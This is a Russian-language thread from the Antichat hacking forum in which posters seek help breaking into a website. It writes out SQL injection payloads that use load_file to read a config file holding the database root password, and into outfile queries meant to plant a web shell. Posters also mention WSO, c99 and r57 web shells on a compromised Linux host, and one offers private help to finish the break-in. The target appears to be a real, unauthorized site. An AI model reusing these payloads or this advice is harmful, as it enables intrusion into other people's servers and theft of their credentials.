ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Пошло дело . Спасибо.

Нашёл очень лакомую Time-Based скулю. Подскажите нормальный софт, ориентированный именно на неё ??

З.Ы. Канал стабильный, без скачков.

Можно ли как-то это использовать и куда копать?

Для начало поищи другой уязвимый параметр

Хех. Цитирую сам себя уже.

Ну в общем нашёл я нужную утилиту. Называется Marathon Tool

Специально заточена под Time-Based SQL

Сайт автора тут

Прошу помощи!

Как всегда начну с фразы: "Уважаемые знатоки!"

Есть сайт:

1)file_priv=y

2)mq=off

3) есть /test.php

3) Доступ 4х администраторов в админку есть, доступ в админку www.site.ru/cms) - так он не пускает но если через www.site.ru/index.php/cms тогда пускает но не выполняются скрипты.

4) прочитан config.ini есть пароль root к базе. Но путь до самой базы не известен.

Теперь самое интересное:

config.ini прочитан так:

index/***/id/*21'+or+1+group+by+concat(mid(load_file(0xздес ьхеш),50,163),floor(rand(0)*2))+having+min(0)+ or+1+--+

запрос на запись делаем так: /image/*****/id/*53+and+(select+'+into+outfile+')+!=1

результат - ошибка но через пару часов при

/image/*****/id/*53 без инъекта появляется следущее:

яШяаJFIF

HHяб4ExifII*




b

j(

1
r2
Ћi‡
¤шЂь 'Ђь 'Adobe Photoshop CS2 Windows2011:07:05 16:16:46†’Ъ

яя 
Ж 
zLEAD Technologies Inc. V1.01



F


N
(



V

ЦH
H
яШ� �аJFIF
HHянAdobe_CMяоAdobedЂ
яЫ„   
  яАc 
"

яЭ яД
?







 








 

3
!1AQa"qЃ2‘Ў

и т.д...

ВНИМАНИЕ ВОПРОС!

На сколько высока вероятность то что into outfile не получится (доходчиво: шелл не зальется?)

P.S. возможно не правильный запрос но если запрос сделать так

/image/*****/id/*53+and+'select+'+into+outfile+'+!=1'

то ошибка такова:

Invalid query: File ' !=1' already exists

Спасибо за внимание надеюсь на коментарии, может у кого-то похожая ситуация была.

На линьке WSO. Нужно из шелла попасть в одну директорию, но в ней содержится оочень много файлов одного расширения и поэтому, при заходе в директорию отображается пустая страница. Как исправить это недоразумение?

Использовал другие шеллы: с99, r57 и т.д. Результат один и он не устраивает.

Надеюсь вопрос корректно составлен.

зайди в консоль(в шелле) ls -lah /путь/до/директории

2lion-art по твоим описаниям залить шелл как два пальца об асфальт но...

спали в ПМ линк посмотрю и отпишусь, так как трудно что то тут посоветовать а то за каждый шаг будет плодится еще вопросы.

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.